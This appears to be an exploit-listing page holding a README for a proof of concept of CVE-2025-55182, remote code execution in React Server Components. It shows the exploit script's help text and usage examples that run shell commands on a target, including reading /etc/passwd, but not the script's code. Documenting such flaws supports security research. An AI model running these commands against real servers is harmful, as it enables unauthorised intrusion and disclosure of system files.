Share
## https://sploitus.com/exploit?id=522D4222-1AC8-585C-A806-E25EA1A7232D
# β‘ react2shellpoc
> π¨ **Educational Proof of Concept β Handle With Care**
**react2shellpoc** is a proof-of-concept project demonstrating how a **React-based frontend** can be abused to trigger **system-level shell command execution** under insecure configurations.
This project focuses on:
- π React UI β OS command execution flows
- π§± Broken trust boundaries in modern web stacks
- β οΈ Real-world security risks caused by misconfiguration
---
## π₯ Video PoC
---
## π» Proof of Concept (CLI View)
```bash
βββ(kaliγΏkali)-[~/Documents/tools/2025-55182]
ββ$ python exploit.py -h
/\
/**\
/****\
/******\
/********\
/**********\
||
[CVE-2025-55182 React Server Components RCE]
usage: exploit.py [-h] [-t URL] [-c CMD]
options:
-h, --help show this help message and exit
-t, --target URL Target URL or domain (default: http://hacx.me)
-c, --command CMD Command to execute on target (default: id)
Examples:
exploit.py -t hacx.me -c "whoami"
exploit.py -t http://hacx.me -c "cat /etc/passwd"
exploit.py -t hacx.me -c "ls -la /var/www"